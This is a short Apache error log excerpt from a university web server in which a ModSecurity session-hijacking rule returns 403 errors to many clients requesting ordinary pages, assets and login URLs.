[Mon Aug 28 08:05:49.728594 2023] [:error] [pid 38232] [client 114.5.208.251] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvy7cCo-f0AAJVY6AgAAAAK"]
[Mon Aug 28 08:05:50.130856 2023] [:error] [pid 38060] [client 116.206.14.14] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvy7sCo-f0AAJSsra4AAAAQ"]
[Mon Aug 28 08:05:51.009339 2023] [:error] [pid 38196] [client 114.122.105.223] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOvy78Co-f0AAJU0qW0AAAAD"]
[Mon Aug 28 08:05:51.250916 2023] [:error] [pid 38114] [client 114.122.105.223] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvy78Co-f0AAJTinXgAAAAE"]
[Mon Aug 28 08:05:52.181112 2023] [:error] [pid 38065] [client 114.5.208.251] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOvy8MCo-f0AAJSxYusAAAAH"]
[Mon Aug 28 08:05:52.225680 2023] [:error] [pid 37803] [client 192.178.8.38] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/css/bootstrap.min.css"] [unique_id "ZOvy8MCo-f0AAJOr93AAAAAL"]
[Mon Aug 28 08:05:52.229291 2023] [:error] [pid 38060] [client 192.178.8.40] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/js/bootstrap-datepicker.js"] [unique_id "ZOvy8MCo-f0AAJSsrbAAAAAQ"]
[Mon Aug 28 08:05:52.239442 2023] [:error] [pid 38231] [client 192.178.8.39] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/css/bootstrap.min.css"] [unique_id "ZOvy8MCo-f0AAJVXJZoAAAAJ"]
[Mon Aug 28 08:05:52.242923 2023] [:error] [pid 38114] [client 192.178.8.39] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/css/bootstrap-datepicker3.css"] [unique_id "ZOvy8MCo-f0AAJTinXkAAAAE"]
[Mon Aug 28 08:05:52.243804 2023] [:error] [pid 38195] [client 192.178.8.39] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/css/unla.css"] [unique_id "ZOvy8MCo-f0AAJUz@icAAAAM"]
[Mon Aug 28 08:05:52.248125 2023] [:error] [pid 37539] [client 192.178.8.39] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/bootstrap.min.js"] [unique_id "ZOvy8MCo-f0AAJKjZ6cAAAAG"]
[Mon Aug 28 08:05:52.249582 2023] [:error] [pid 38068] [client 192.178.8.39] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOvy8MCo-f0AAJS0EtgAAAAW"]
[Mon Aug 28 08:05:52.291352 2023] [:error] [pid 38150] [client 192.178.8.39] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOvy8MCo-f0AAJUGIRoAAAAC"]
[Mon Aug 28 08:05:52.375059 2023] [:error] [pid 38065] [client 114.5.208.251] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvy8MCo-f0AAJSxYuwAAAAH"]
[Mon Aug 28 08:05:52.438485 2023] [:error] [pid 38195] [client 192.178.8.39] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/css/unla.css"] [unique_id "ZOvy8MCo-f0AAJUz@igAAAAM"]
[Mon Aug 28 08:05:52.461131 2023] [:error] [pid 38196] [client 192.178.8.38] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/css/bootstrap-datepicker3.css"] [unique_id "ZOvy8MCo-f0AAJU0qW4AAAAD"]
[Mon Aug 28 08:05:52.500164 2023] [:error] [pid 38231] [client 192.178.8.38] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/css/unla.css"] [unique_id "ZOvy8MCo-f0AAJVXJZsAAAAJ"]
[Mon Aug 28 08:05:54.438626 2023] [:error] [pid 38068] [client 114.5.208.251] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOvy8sCo-f0AAJS0EtkAAAAW"]
[Mon Aug 28 08:05:54.446385 2023] [:error] [pid 38195] [client 114.122.105.223] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOvy8sCo-f0AAJUz@ikAAAAM"]
[Mon Aug 28 08:05:54.680323 2023] [:error] [pid 38196] [client 114.5.208.251] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvy8sCo-f0AAJU0qW8AAAAD"]
[Mon Aug 28 08:05:54.889309 2023] [:error] [pid 38231] [client 114.122.105.223] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvy8sCo-f0AAJVXJZwAAAAJ"]
[Mon Aug 28 08:06:49.521668 2023] [:error] [pid 38068] [client 114.5.208.251] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOvzKcCo-f0AAJS0EuMAAAAW"]
[Mon Aug 28 08:06:53.808116 2023] [:error] [pid 38065] [client 114.122.105.223] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOvzLcCo-f0AAJSxYvUAAAAH"]
[Mon Aug 28 08:06:54.080185 2023] [:error] [pid 38149] [client 114.122.105.223] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvzLsCo-f0AAJUFNRYAAAAA"]
[Mon Aug 28 08:07:12.927523 2023] [:error] [pid 37539] [client 114.122.105.223] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOvzQMCo-f0AAJKjZ7oAAAAG"]
[Mon Aug 28 08:07:13.679509 2023] [:error] [pid 37803] [client 114.122.105.223] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvzQcCo-f0AAJOr94IAAAAL"]
[Mon Aug 28 08:07:34.659027 2023] [:error] [pid 38149] [client 114.122.105.223] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOvzVsCo-f0AAJUFNRwAAAAA"]
[Mon Aug 28 08:07:34.847947 2023] [:error] [pid 37539] [client 114.122.105.223] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvzVsCo-f0AAJKjZ8AAAAAG"]
[Mon Aug 28 08:07:43.518948 2023] [:error] [pid 37539] [client 114.122.105.223] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOvzX8Co-f0AAJKjZ8IAAAAG"]
[Mon Aug 28 08:07:43.609753 2023] [:error] [pid 37803] [client 114.122.105.223] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvzX8Co-f0AAJOr94kAAAAL"]
[Mon Aug 28 08:07:46.072315 2023] [:error] [pid 38065] [client 114.122.105.223] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOvzYsCo-f0AAJSxYwAAAAAH"]
[Mon Aug 28 08:07:46.480606 2023] [:error] [pid 38149] [client 114.122.105.223] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvzYsCo-f0AAJUFNSAAAAAA"]
[Mon Aug 28 08:07:47.778845 2023] [:error] [pid 37539] [client 114.122.105.223] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOvzY8Co-f0AAJKjZ8MAAAAG"]
[Mon Aug 28 08:07:47.898882 2023] [:error] [pid 37803] [client 114.122.105.223] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvzY8Co-f0AAJOr94oAAAAL"]
[Mon Aug 28 08:08:20.960591 2023] [:error] [pid 38150] [client 114.122.105.223] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOvzhMCo-f0AAJUGITQAAAAC"]
[Mon Aug 28 08:08:21.509186 2023] [:error] [pid 38065] [client 114.122.105.223] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvzhcCo-f0AAJSxYwYAAAAH"]
[Mon Aug 28 08:08:46.772900 2023] [:error] [pid 37803] [client 114.122.105.223] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZOvznsCo-f0AAJOr95cAAAAL"]
[Mon Aug 28 08:08:46.977450 2023] [:error] [pid 38196] [client 114.122.105.223] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvznsCo-f0AAJU0qY8AAAAD"]
[Mon Aug 28 08:09:03.704920 2023] [:error] [pid 38065] [client 116.206.14.8] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/bg-unla.png"] [unique_id "ZOvzr8Co-f0AAJSxYw8AAAAH"]
[Mon Aug 28 08:09:03.804867 2023] [:error] [pid 38196] [client 116.206.14.8] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/bg-unla.png"] [unique_id "ZOvzr8Co-f0AAJU0qZQAAAAD"]
[Mon Aug 28 08:09:03.840227 2023] [:error] [pid 38195] [client 116.206.14.8] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/icon.png"] [unique_id "ZOvzr8Co-f0AAJUz@kkAAAAM"]
[Mon Aug 28 08:09:03.985737 2023] [:error] [pid 38149] [client 116.206.14.8] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/icon.png"] [unique_id "ZOvzr8Co-f0AAJUFNSoAAAAA"]
[Mon Aug 28 08:09:05.749437 2023] [:error] [pid 38149] [client 116.206.14.8] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOvzscCo-f0AAJUFNSsAAAAA"]
[Mon Aug 28 08:09:05.915972 2023] [:error] [pid 38075] [client 116.206.14.8] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvzscCo-f0AAJS7R4QAAAAB"]
[Mon Aug 28 08:09:09.108938 2023] [:error] [pid 38196] [client 116.206.14.8] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/icon.png"] [unique_id "ZOvztcCo-f0AAJU0qZUAAAAD"]
[Mon Aug 28 08:09:12.816884 2023] [:error] [pid 38075] [client 116.206.14.8] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOvzuMCo-f0AAJS7R4YAAAAB"]
[Mon Aug 28 08:09:13.002739 2023] [:error] [pid 38059] [client 116.206.14.8] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvzucCo-f0AAJSr2soAAAAO"]
[Mon Aug 28 08:09:17.430241 2023] [:error] [pid 37803] [client 125.164.16.55] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/css/bootstrap-datepicker3.css"] [unique_id "ZOvzvcCo-f0AAJOr96AAAAAL"]
[Mon Aug 28 08:09:17.430819 2023] [:error] [pid 38114] [client 125.164.23.134] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/css/bootstrap.min.css"] [unique_id "ZOvzvcCo-f0AAJTinaMAAAAE"]
[Mon Aug 28 08:09:17.444755 2023] [:error] [pid 38195] [client 125.164.23.134] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/css/unla.css"] [unique_id "ZOvzvcCo-f0AAJUz@k0AAAAM"]
[Mon Aug 28 08:09:17.462646 2023] [:error] [pid 38196] [client 125.164.16.55] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/bootstrap.min.js"] [unique_id "ZOvzvcCo-f0AAJU0qZkAAAAD"]
[Mon Aug 28 08:09:17.462900 2023] [:error] [pid 38075] [client 125.164.17.176] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOvzvcCo-f0AAJS7R4gAAAAB"]
[Mon Aug 28 08:09:17.463881 2023] [:error] [pid 38059] [client 125.164.22.118] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/js/bootstrap-datepicker.js"] [unique_id "ZOvzvcCo-f0AAJSr2ssAAAAO"]
[Mon Aug 28 08:09:17.483602 2023] [:error] [pid 38114] [client 125.164.20.63] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/logo-unla-mobile.png"] [unique_id "ZOvzvcCo-f0AAJTinaQAAAAE"]
[Mon Aug 28 08:09:17.488017 2023] [:error] [pid 38195] [client 125.164.22.118] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/logo-unla.png"] [unique_id "ZOvzvcCo-f0AAJUz@k4AAAAM"]
[Mon Aug 28 08:09:17.488769 2023] [:error] [pid 38075] [client 125.164.18.164] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOvzvcCo-f0AAJS7R4kAAAAB"]
[Mon Aug 28 08:09:17.506345 2023] [:error] [pid 38196] [client 125.164.19.6] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/bootstrap.min.js"] [unique_id "ZOvzvcCo-f0AAJU0qZoAAAAD"]
[Mon Aug 28 08:09:17.525890 2023] [:error] [pid 37803] [client 125.164.23.134] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/js/bootstrap-datepicker.js"] [unique_id "ZOvzvcCo-f0AAJOr96EAAAAL"]
[Mon Aug 28 08:09:17.552736 2023] [:error] [pid 38059] [client 125.164.20.63] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvzvcCo-f0AAJSr2swAAAAO"]
[Mon Aug 28 08:09:30.336595 2023] [:error] [pid 38196] [client 114.122.105.223] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/login"] [unique_id "ZOvzysCo-f0AAJU0qZ4AAAAD"]
[Mon Aug 28 08:09:30.557083 2023] [:error] [pid 38114] [client 114.122.105.223] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOvzysCo-f0AAJTinagAAAAE"]
[Mon Aug 28 08:10:51.225584 2023] [:error] [pid 38150] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/reset-min.css"] [unique_id "ZOv0G8Co-f0AAJUGIVYAAAAC"]
[Mon Aug 28 08:10:51.232070 2023] [:error] [pid 38303] [client 139.0.114.86] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/css/style.css"] [unique_id "ZOv0G8Co-f0AAJWfZG4AAAAI"]
